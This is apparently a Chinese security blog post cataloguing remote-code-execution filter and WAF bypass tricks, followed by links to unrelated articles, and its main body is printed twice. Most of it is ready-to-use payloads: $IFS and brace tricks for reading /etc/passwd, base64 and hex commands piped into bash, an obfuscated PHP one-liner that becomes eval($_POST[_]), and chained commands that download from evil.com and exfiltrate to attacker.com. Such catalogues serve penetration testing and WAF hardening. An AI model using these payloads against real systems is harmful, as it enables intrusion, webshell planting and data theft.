1. 空格过滤的N种花式绕过当Web应用对空格进行过滤时攻击者往往会陷入困境。但实战中我发现Linux系统提供了至少8种等效空格的替代方案。最经典的是使用$IFS环境变量这个存储着默认分隔符的变量在bash中默认就是空格。比如执行cat$IFS/etc/passwd就能完美绕过基础过滤。更隐蔽的招数是用${IFS}的变体形式比如$IFS$9。这里的$9指向第9个命令行参数通常为空字符串组合起来就成了隐形空格。我曾在一个CTF比赛中用{cat,/etc/passwd}这种花括号语法成功绕过WAF原理是花括号内的逗号会被解析为参数分隔符。对于Web环境还可以用URL编码套路%20是标准空格编码%09是水平制表符%0a换行符在某些场景也能用有个特别骚的操作是用重定向符号伪装cat/etc/passwd。这个符号在Linux中会被解析为输入重定向但看起来完全不像空格。类似的还有组合我在测试某电商系统时就用这招突破了过滤。2. 命令执行函数的七十二变很多WAF会重点监控system()、exec()这类高危函数但PHP实际有十几种执行命令的途径。有次渗透测试遇到过滤system的情况我改用反引号ls直接执行成功——这种语法本质调用的是shell_exec()。更隐蔽的姿势是利用popen()和proc_open()这类流式处理函数。比如$handle popen(whoami, r); echo fread($handle, 1024); pclose($handle);这种写法既执行了命令又规避了直接的关键词匹配。PHP的动态函数调用特性更是个宝藏$func sy.stem; $func(ls);通过字符串拼接就能轻松绕过静态检测。我还见过用call_user_func_array()调用命令的案例这种冷门函数很少被加入黑名单。3. 连接符的魔法组合命令连接符就像SQL注入中的and/or不同组合会产生奇妙效果。Windows和Linux都支持的符号最实用ping 127.0.0.1 whoami这个会让前后命令都执行常用于盲注场景。在Linux中分号;是万能连接器cd /tmp; wget http://evil.com/shell但更狡猾的是||组合只有前命令失败才执行后者。有次遇到严格过滤的登录接口我构造false || curl -X POST https://attacker.com成功触发了数据外泄。最危险的是连接它要求前命令必须成功[ -f /etc/passwd ] cat /etc/passwd这种写法在防御方看来就像普通条件判断极具迷惑性。4. 编码的艺术从Base64到十六进制当直接输入命令被拦截时编码转换就是绝佳跳板。Base64是最常用的echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash这个payload先解码成cat /etc/passwd再执行。我在某次红队行动中用这种三层嵌套绕过EDR检测echo d2hvYW1p | base64 -d | bash十六进制更隐蔽echo 636174202F6574632F706173737764 | xxd -r -p | bash甚至可以用八进制ASCII码$(printf \154\163) # 等价于ls最绝的是Unicode编码绕过像这样\u{63}\u{61}\u{74} /etc/passwd这种写法在PHP环境下尤其有效很多WAF根本不会解码检测。5. 通配符的奇幻漂流Linux的通配符简直是绕过利器。当/被过滤时可以这样玩cat /etc???pass*问号匹配单个字符星号匹配任意长度。有次遇到严格过滤的场景我用cat /e??/p??s??成功读取了密码文件。更高级的玩法是用字符类cat /[e]tc/[p]asswd方括号表示匹配其中任意字符虽然这里只有一个字符显得多此一举但能有效干扰正则检测。花括号扩展也很有用{cat,/etc/passwd}这种语法会被解析为两个参数完全避开了空格检测。我在某个云服务商的沙箱逃逸漏洞中就用这个技巧突破了命令限制。6. 变量拼接的魔术戏法PHP的变量特性让安全过滤变得困难。看这个例子$asys;$btem;$a.$b(whoami);通过字符串拼接动态生成system函数名。更隐蔽的版本$_[];$_$_;$_$_[!];$__$_;$__;$__;$__;$___$__;$__;$__;$____$__;$__;$__;$_____$__;$______$____$___$__$_____;$______($_[_]);这段天书般的代码最终执行的是eval($_POST[_])原理是利用数组转换和字符自增。环境变量也能玩出花${PATH:0:1} # 提取PATH变量的第一个字符(/) ${PATH:5:1}${PATH:2:1} # 组合成ls这种写法完全不出现任何命令关键词靠变量截取拼出完整指令。7. 注释的障眼法PHP注释不仅能干扰代码审计还能帮助绕过WAF。例如system/*这是注释*/(whoami);注释完美拆分了函数名和参数。更复杂的变种(sy./*xyz*/.stem)/**/(wh./*123*/.oami);这种写法对基于正则的防护简直是降维打击。我在测试某防火墙时用这种技巧成功执行了system(whoami)。HTML实体编码也值得一试system(#x77;#x68;#x6f;#x61;#x6d;#x69;);服务端会自动解码为正常命令但WAF可能只检查原始输入。8. 冷门字符的奇袭有些特殊字符在命令解析中有妙用。比如$*和$在没有参数时都为空who$ami whoa$*mi实际执行的都是whoami。反斜杠转义也能制造混乱c\a\t /etc/passwd未初始化变量是另一个突破口cat$u /etc/passwd这里的$u未定义会被替换为空字符串。我还见过用${undefined}绕过的案例原理相同但更隐蔽。反引号嵌套堪称终极杀招666whoami666虽然会报错666root666: command not found但命令已经执行且输出结果显示在错误信息中。这种技巧在盲注场景特别有用。
盘点RCE(远程代码执行)那些意想不到的绕过奇技
发布时间:2026/6/29 7:17:54
1. 空格过滤的N种花式绕过当Web应用对空格进行过滤时攻击者往往会陷入困境。但实战中我发现Linux系统提供了至少8种等效空格的替代方案。最经典的是使用$IFS环境变量这个存储着默认分隔符的变量在bash中默认就是空格。比如执行cat$IFS/etc/passwd就能完美绕过基础过滤。更隐蔽的招数是用${IFS}的变体形式比如$IFS$9。这里的$9指向第9个命令行参数通常为空字符串组合起来就成了隐形空格。我曾在一个CTF比赛中用{cat,/etc/passwd}这种花括号语法成功绕过WAF原理是花括号内的逗号会被解析为参数分隔符。对于Web环境还可以用URL编码套路%20是标准空格编码%09是水平制表符%0a换行符在某些场景也能用有个特别骚的操作是用重定向符号伪装cat/etc/passwd。这个符号在Linux中会被解析为输入重定向但看起来完全不像空格。类似的还有组合我在测试某电商系统时就用这招突破了过滤。2. 命令执行函数的七十二变很多WAF会重点监控system()、exec()这类高危函数但PHP实际有十几种执行命令的途径。有次渗透测试遇到过滤system的情况我改用反引号ls直接执行成功——这种语法本质调用的是shell_exec()。更隐蔽的姿势是利用popen()和proc_open()这类流式处理函数。比如$handle popen(whoami, r); echo fread($handle, 1024); pclose($handle);这种写法既执行了命令又规避了直接的关键词匹配。PHP的动态函数调用特性更是个宝藏$func sy.stem; $func(ls);通过字符串拼接就能轻松绕过静态检测。我还见过用call_user_func_array()调用命令的案例这种冷门函数很少被加入黑名单。3. 连接符的魔法组合命令连接符就像SQL注入中的and/or不同组合会产生奇妙效果。Windows和Linux都支持的符号最实用ping 127.0.0.1 whoami这个会让前后命令都执行常用于盲注场景。在Linux中分号;是万能连接器cd /tmp; wget http://evil.com/shell但更狡猾的是||组合只有前命令失败才执行后者。有次遇到严格过滤的登录接口我构造false || curl -X POST https://attacker.com成功触发了数据外泄。最危险的是连接它要求前命令必须成功[ -f /etc/passwd ] cat /etc/passwd这种写法在防御方看来就像普通条件判断极具迷惑性。4. 编码的艺术从Base64到十六进制当直接输入命令被拦截时编码转换就是绝佳跳板。Base64是最常用的echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash这个payload先解码成cat /etc/passwd再执行。我在某次红队行动中用这种三层嵌套绕过EDR检测echo d2hvYW1p | base64 -d | bash十六进制更隐蔽echo 636174202F6574632F706173737764 | xxd -r -p | bash甚至可以用八进制ASCII码$(printf \154\163) # 等价于ls最绝的是Unicode编码绕过像这样\u{63}\u{61}\u{74} /etc/passwd这种写法在PHP环境下尤其有效很多WAF根本不会解码检测。5. 通配符的奇幻漂流Linux的通配符简直是绕过利器。当/被过滤时可以这样玩cat /etc???pass*问号匹配单个字符星号匹配任意长度。有次遇到严格过滤的场景我用cat /e??/p??s??成功读取了密码文件。更高级的玩法是用字符类cat /[e]tc/[p]asswd方括号表示匹配其中任意字符虽然这里只有一个字符显得多此一举但能有效干扰正则检测。花括号扩展也很有用{cat,/etc/passwd}这种语法会被解析为两个参数完全避开了空格检测。我在某个云服务商的沙箱逃逸漏洞中就用这个技巧突破了命令限制。6. 变量拼接的魔术戏法PHP的变量特性让安全过滤变得困难。看这个例子$asys;$btem;$a.$b(whoami);通过字符串拼接动态生成system函数名。更隐蔽的版本$_[];$_$_;$_$_[!];$__$_;$__;$__;$__;$___$__;$__;$__;$____$__;$__;$__;$_____$__;$______$____$___$__$_____;$______($_[_]);这段天书般的代码最终执行的是eval($_POST[_])原理是利用数组转换和字符自增。环境变量也能玩出花${PATH:0:1} # 提取PATH变量的第一个字符(/) ${PATH:5:1}${PATH:2:1} # 组合成ls这种写法完全不出现任何命令关键词靠变量截取拼出完整指令。7. 注释的障眼法PHP注释不仅能干扰代码审计还能帮助绕过WAF。例如system/*这是注释*/(whoami);注释完美拆分了函数名和参数。更复杂的变种(sy./*xyz*/.stem)/**/(wh./*123*/.oami);这种写法对基于正则的防护简直是降维打击。我在测试某防火墙时用这种技巧成功执行了system(whoami)。HTML实体编码也值得一试system(#x77;#x68;#x6f;#x61;#x6d;#x69;);服务端会自动解码为正常命令但WAF可能只检查原始输入。8. 冷门字符的奇袭有些特殊字符在命令解析中有妙用。比如$*和$在没有参数时都为空who$ami whoa$*mi实际执行的都是whoami。反斜杠转义也能制造混乱c\a\t /etc/passwd未初始化变量是另一个突破口cat$u /etc/passwd这里的$u未定义会被替换为空字符串。我还见过用${undefined}绕过的案例原理相同但更隐蔽。反引号嵌套堪称终极杀招666whoami666虽然会报错666root666: command not found但命令已经执行且输出结果显示在错误信息中。这种技巧在盲注场景特别有用。
相关文章
2026年性能测试平台选型:从工具到CI/CD原生集成的演进与实践
1. 项目概述:为什么2026年的性能测试平台选型如此不同?如果你现在还在用JMeter脚本Jenkins定时任务来跑性能测试,并且觉得“够用就行”,那这篇文章就是为你准备的。我干了十多年性能测试和DevOps,亲眼看着这个领域从“…
【软工方法论49】链路追踪系统设计
【软工方法论49】319_链路追踪系统设计 链路追踪系统设计 你有没有遇到过这种情况? 接口超时了: 不知道哪个服务慢 不知道调用链路 只能一个个服务排查 排查半天找不到问题 链路追踪就是来解决这个问题的。 一、链路追踪概述 1. 分布式调用的问题 单体应用调用: 用户 …
MPU6050 DMP自检与倾斜检测实战避坑指南
1. MPU6050 DMP初始化自检失败的常见原因 MPU6050的DMP(Digital Motion Processor)初始化自检失败是开发者最常遇到的问题之一。我遇到过不下十次自检失败的情况,每次都能发现新的坑点。自检失败时,LCD屏幕上会不断显示"MPU6…
湛江高口碑黄金铂金回收白银回收实体老店排行 5 家靠谱门店电话地址全收录
湛江的街头巷尾,黄金铂金白银回收门店鳞次栉比,看似选择众多,实则鱼龙混杂,不少市民面对高价幌子与隐形扣费陷阱,往往难辨真伪。为帮街坊邻里甄选靠谱变现渠道,小编实地走访、层层筛选,逐一核验…
UI自动化测试核心实践:元素定位与智能等待策略详解
1. 项目概述:从“找得到”到“等得起”的UI自动化基石做UI自动化测试,听起来很高大上,但说白了,核心就两件事:第一,你得告诉程序“点哪里”;第二,你得确保程序“点的时候,…
Selenium自动化测试异常处理:从NoSuchElementException到健壮脚本的实战策略
1. 项目概述:为什么异常处理是UI自动化的“生命线”干了这么多年自动化测试,我见过太多脚本因为一个弹窗、一个元素加载慢、或者一个意料之外的网络抖动就全线崩溃的场景。一个健壮的UI自动化测试脚本,其价值往往不在于它能执行多少条用例&am…
基于HarmonyOS 7.0 跨端开发的随机写作灵感生成器页面实战
基于HarmonyOS 7.0 跨端开发的随机写作灵感生成器页面实战 前言 创意激发类应用的妙处,在于用随机组合打破思维定式,给用户带来意想不到的灵感火花。写作灵感生成器就是典型:它把"人物 场景 冲突"三个维度随机组合,生…
大麦网抢票神器:5分钟配置Python自动化脚本告别黄牛票
大麦网抢票神器:5分钟配置Python自动化脚本告别黄牛票 【免费下载链接】DamaiHelper 大麦网演唱会演出抢票脚本。 项目地址: https://gitcode.com/gh_mirrors/dama/DamaiHelper 还在为抢不到演唱会门票而烦恼吗?面对秒光的票源和高价黄牛票&#…
零代码UI自动化测试录制工具:原理、实现与实战指南
1. 项目概述:当UI自动化测试遇上“零代码录制”最近在团队里做测试效率复盘,发现一个老生常谈的痛点:UI自动化测试的脚本编写和维护成本太高了。一个功能点的改动,测试同学可能要花半天甚至一天去更新脚本,业务方还总催…
Java开发者转型安全开发:从代码审计到自动化工具实践
1. 转型背景与核心驱动力最近几年,身边不少做Java后端开发的朋友,都开始或多或少地关注起安全开发这个方向。我自己也是从写了七八年Java业务代码,一步步转向了安全领域,现在主要做代码审计和自动化安全工具开发。这个转变不是一时…
【TEE从入门到精通及实战】75 TEE内Wasm沙箱的内存安全:从“段错误”到“编译时保证”
75 TEE内Wasm沙箱的内存安全:从“段错误”到“编译时保证” 开篇故事 去年夏天,我正帮一家金融科技公司优化他们的TEE内Wasm沙箱。他们的核心业务是在Intel SGX enclave里运行用户提交的Wasm合约,用于实时交易验证。 一天下午,运维突然报警:生产环境的enclave进程频繁崩…
YAML函数动态解析:打造智能接口自动化测试用例
1. 项目概述:为什么YAML测试用例需要函数动态解析?在接口自动化测试的实践中,我们常常会面临一个核心矛盾:测试用例的可维护性与灵活性。早期的测试脚本,无论是用Python的unittest还是pytest,往往将测试数据…
AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告
6个月前的2025年12月,Boris Cherny 公开宣布自己卸载了 IDE。一时间,Vibe Coding 成了全行业最热的话题。6个月后,当我们回过头来拉一份真实账本,发现事情远没有"一句话生成一个App"那么浪漫。本文从产品经理和研发两个…
华为OD机试2025C卷-字符统计及重排[100分]( Java _ Python3 _ C++ _ C语言 _ JsNode _ Go)实现100%通过率
📫 个人主页:深夜coding算法 📣 专栏系列:2026年华为最新OD机试题库详解 🔥 一次订阅,永久解锁 | 持续更新100篇 | 6语言全覆盖 文章目录❄️前言:☀️一:题目描述🌙 题目…
华为OD机试2025C卷-寻找相同子串[100分]( Java _ Python3 _ C++ _ C语言 _ JsNode _ Go)实现100%通过率
📫 个人主页:深夜coding算法 📣 专栏系列:2026年华为最新OD机试题库详解 🔥 一次订阅,永久解锁 | 持续更新100篇 | 6语言全覆盖 文章目录❄️前言:☀️一:题目描述🌙 题目…
Zotero Duplicates Merger:5步彻底清理文献库重复条目
Zotero Duplicates Merger:5步彻底清理文献库重复条目 【免费下载链接】ZoteroDuplicatesMerger A zotero plugin to automatically merge duplicate items 项目地址: https://gitcode.com/gh_mirrors/zo/ZoteroDuplicatesMerger 还在为文献库中堆积如山的重…
利用随机有限集理论对蜂群的ILQR和MPC控制研究附Matlab代码
✅作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。🍎 往期回顾关注个人主页:Matlab科研工作室🍊个人信条:格物致知,完整Matlab代码及仿真咨询…
为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因
更多请点击: https://intelliparadigm.com 第一章:为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因 Gemini邮件的客户转化效率(CTE)显著偏低,根本原因常被误判为…